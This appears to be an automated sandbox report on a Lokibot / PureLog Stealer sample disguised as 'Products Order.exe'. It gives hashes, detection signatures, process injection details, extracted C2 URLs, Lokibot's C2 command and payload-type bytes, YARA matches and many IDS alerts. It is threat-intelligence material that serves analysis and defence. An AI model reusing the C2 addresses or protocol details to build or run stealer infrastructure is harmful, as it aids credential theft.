Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Products Order.exe

Overview

General Information

Sample name:Products Order.exe
Analysis ID:1442315
MD5:ab09f11ddb556069549717cc1f37fdc1
SHA1:e4cba5e88d12df5f9b0eb1dab978b48d63f6b57b
SHA256:6946d0d3322995d1c4a8f407b8a627e37644dcc4ddef07b97167f9a4e57b0ee1
Tags:exeLoki
Infos:

Detection

Lokibot, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected Lokibot
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large strings
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: AspNetCompiler Execution
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Products Order.exe (PID: 3436 cmdline: "C:\Users\user\Desktop\Products Order.exe" MD5: AB09F11DDB556069549717CC1F37FDC1)
    • aspnet_compiler.exe (PID: 5352 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "45.90.57.51/big/five/fre.php"]}
SourceRuleDescriptionAuthorStrings
Products Order.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
            • 0x178c0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
            00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
            • 0x4c8b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
            Click to see the 24 entries
            SourceRuleDescriptionAuthorStrings
            0.2.Products Order.exe.12aa64d0.2.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
              0.2.Products Order.exe.12aa64d0.2.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                0.2.Products Order.exe.12aa64d0.2.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  0.2.Products Order.exe.12aa64d0.2.raw.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
                  • 0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
                  0.2.Products Order.exe.12aa64d0.2.raw.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
                  • 0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
                  Click to see the 25 entries

                  System Summary

                  barindex
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\Products Order.exe", ParentImage: C:\Users\user\Desktop\Products Order.exe, ParentProcessId: 3436, ParentProcessName: Products Order.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 5352, ProcessName: aspnet_compiler.exe
                  Timestamp:05/16/24-00:37:53.617485
                  SID:2025483
                  Source Port:80
                  Destination Port:49744
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:12.750490
                  SID:2024318
                  Source Port:49755
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:35.693093
                  SID:2825766
                  Source Port:49766
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:01.238713
                  SID:2025483
                  Source Port:80
                  Destination Port:49709
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:00.746100
                  SID:2024313
                  Source Port:49709
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:08.955748
                  SID:2021641
                  Source Port:49752
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:37.577907
                  SID:2021641
                  Source Port:49767
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:36:54.264582
                  SID:2825766
                  Source Port:49705
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:43.623424
                  SID:2025381
                  Source Port:49738
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:00.746100
                  SID:2024318
                  Source Port:49709
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:36:57.478820
                  SID:2025483
                  Source Port:80
                  Destination Port:49707
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:07.254938
                  SID:2024313
                  Source Port:49712
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:41.744488
                  SID:2024318
                  Source Port:49737
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:36:55.076784
                  SID:2021641
                  Source Port:49706
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:50.123310
                  SID:2024318
                  Source Port:49773
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:07.254938
                  SID:2024318
                  Source Port:49712
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:41.744488
                  SID:2024313
                  Source Port:49737
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:12.990169
                  SID:2025381
                  Source Port:49723
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:33.315004
                  SID:2825766
                  Source Port:49733
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:01.356159
                  SID:2825766
                  Source Port:49748
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:01.857131
                  SID:2025483
                  Source Port:80
                  Destination Port:49748
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:07.071740
                  SID:2825766
                  Source Port:49751
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:50.123310
                  SID:2024313
                  Source Port:49773
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:43.272420
                  SID:2021641
                  Source Port:49770
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:12.750490
                  SID:2024313
                  Source Port:49755
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:23.884685
                  SID:2025381
                  Source Port:49728
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:57.604255
                  SID:2025483
                  Source Port:80
                  Destination Port:49746
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:36:54.264582
                  SID:2025381
                  Source Port:49705
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:47.955066
                  SID:2025483
                  Source Port:80
                  Destination Port:49740
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:49.847441
                  SID:2025483
                  Source Port:80
                  Destination Port:49742
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:03.239293
                  SID:2021641
                  Source Port:49749
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:55.010656
                  SID:2024313
                  Source Port:49745
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:29.556038
                  SID:2025381
                  Source Port:49731
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:45.530428
                  SID:2021641
                  Source Port:49739
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:11.067189
                  SID:2024313
                  Source Port:49722
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:35.693093
                  SID:2025381
                  Source Port:49766
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:17.603710
                  SID:2021641
                  Source Port:49757
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:09.170149
                  SID:2025381
                  Source Port:49713
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:01.356159
                  SID:2025381
                  Source Port:49748
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:35.199755
                  SID:2021641
                  Source Port:49734
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:27.085627
                  SID:2021641
                  Source Port:49762
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:28.951650
                  SID:2024318
                  Source Port:49763
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:19.541569
                  SID:2825766
                  Source Port:49758
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:20.628600
                  SID:2024313
                  Source Port:49727
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:47.452852
                  SID:2024313
                  Source Port:49740
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:28.951650
                  SID:2024313
                  Source Port:49763
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:20.628600
                  SID:2024318
                  Source Port:49727
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:47.452852
                  SID:2024318
                  Source Port:49740
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:36:52.383820
                  SID:2024312
                  Source Port:49704
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:36:52.383820
                  SID:2024317
                  Source Port:49704
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:55.010656
                  SID:2024318
                  Source Port:49745
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:11.067189
                  SID:2024318
                  Source Port:49722
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:12.990169
                  SID:2825766
                  Source Port:49723
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:25.750611
                  SID:2024318
                  Source Port:49729
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:11.363615
                  SID:2025483
                  Source Port:80
                  Destination Port:49753
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:37.637986
                  SID:2025483
                  Source Port:80
                  Destination Port:49735
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:25.750611
                  SID:2024313
                  Source Port:49729
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:29.556038
                  SID:2825766
                  Source Port:49731
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:57.099162
                  SID:2825766
                  Source Port:49746
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:37.130221
                  SID:2024313
                  Source Port:49735
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:16.803035
                  SID:2825766
                  Source Port:49725
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:59.470457
                  SID:2021641
                  Source Port:49747
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:52.514469
                  SID:2025483
                  Source Port:80
                  Destination Port:49774
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:53.898131
                  SID:2021641
                  Source Port:49775
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:07.768110
                  SID:2025483
                  Source Port:80
                  Destination Port:49712
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:43.763044
                  SID:2025483
                  Source Port:80
                  Destination Port:49770
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:41.388891
                  SID:2021641
                  Source Port:49769
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:52.000180
                  SID:2825766
                  Source Port:49774
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:19.541569
                  SID:2025381
                  Source Port:49758
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:53.120055
                  SID:2021641
                  Source Port:49744
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:05.193094
                  SID:2021641
                  Source Port:49750
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:18.130281
                  SID:2025483
                  Source Port:80
                  Destination Port:49757
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:30.894418
                  SID:2025381
                  Source Port:49764
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:37.130221
                  SID:2024318
                  Source Port:49735
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:30.052185
                  SID:2025483
                  Source Port:80
                  Destination Port:49731
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:39.485062
                  SID:2825766
                  Source Port:49768
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:31.431993
                  SID:2024318
                  Source Port:49732
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:46.034175
                  SID:2025483
                  Source Port:80
                  Destination Port:49739
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:51.232610
                  SID:2025381
                  Source Port:49743
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:31.431993
                  SID:2024313
                  Source Port:49732
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:36:58.862053
                  SID:2021641
                  Source Port:49708
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:49.343817
                  SID:2021641
                  Source Port:49742
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:36:56.970973
                  SID:2024318
                  Source Port:49707
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:45.151548
                  SID:2024318
                  Source Port:49771
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:07.071740
                  SID:2025381
                  Source Port:49751
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:36:56.970973
                  SID:2024313
                  Source Port:49707
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:27.656502
                  SID:2024313
                  Source Port:49730
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:33.811515
                  SID:2024313
                  Source Port:49765
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:27.656502
                  SID:2024318
                  Source Port:49730
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:33.811515
                  SID:2024318
                  Source Port:49765
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:43.623424
                  SID:2825766
                  Source Port:49738
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:45.151548
                  SID:2024313
                  Source Port:49771
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:14.907253
                  SID:2024318
                  Source Port:49724
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:14.907253
                  SID:2024313
                  Source Port:49724
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:23.333175
                  SID:2024318
                  Source Port:49760
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:02.627302
                  SID:2025381
                  Source Port:49710
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:47.045718
                  SID:2021641
                  Source Port:49772
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:25.211849
                  SID:2825766
                  Source Port:49761
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:15.699411
                  SID:2025381
                  Source Port:49756
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:23.333175
                  SID:2024313
                  Source Port:49760
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:39.020338
                  SID:2021641
                  Source Port:49736
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:36:58.862053
                  SID:2825766
                  Source Port:49708
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:21.133210
                  SID:2025483
                  Source Port:80
                  Destination Port:49727
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:25.707920
                  SID:2025483
                  Source Port:80
                  Destination Port:49761
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:17.315322
                  SID:2025483
                  Source Port:80
                  Destination Port:49725
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:24.372670
                  SID:2025483
                  Source Port:80
                  Destination Port:49728
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:28.951650
                  SID:2825766
                  Source Port:49763
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:36:55.076784
                  SID:2024318
                  Source Port:49706
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:51.232610
                  SID:2024318
                  Source Port:49743
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:29.456072
                  SID:2025483
                  Source Port:80
                  Destination Port:49763
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:31.400897
                  SID:2025483
                  Source Port:80
                  Destination Port:49764
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:36.199531
                  SID:2025483
                  Source Port:80
                  Destination Port:49766
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:51.232610
                  SID:2024313
                  Source Port:49743
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:36:55.076784
                  SID:2024313
                  Source Port:49706
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:55.010656
                  SID:2825766
                  Source Port:49745
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:41.892700
                  SID:2025483
                  Source Port:80
                  Destination Port:49769
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:11.574808
                  SID:2025483
                  Source Port:80
                  Destination Port:49722
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:04.537805
                  SID:2025381
                  Source Port:49711
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:30.894418
                  SID:2021641
                  Source Port:49764
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:50.123310
                  SID:2021641
                  Source Port:49773
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:39.020338
                  SID:2825766
                  Source Port:49736
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:55.010656
                  SID:2021641
                  Source Port:49745
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:27.085627
                  SID:2024318
                  Source Port:49762
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:17.603710
                  SID:2024313
                  Source Port:49757
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:35.199755
                  SID:2024313
                  Source Port:49734
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:27.085627
                  SID:2024313
                  Source Port:49762
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:35.199755
                  SID:2024318
                  Source Port:49734
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:45.151548
                  SID:2025381
                  Source Port:49771
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:27.656502
                  SID:2025381
                  Source Port:49730
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:37.130221
                  SID:2825766
                  Source Port:49735
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:17.603710
                  SID:2024318
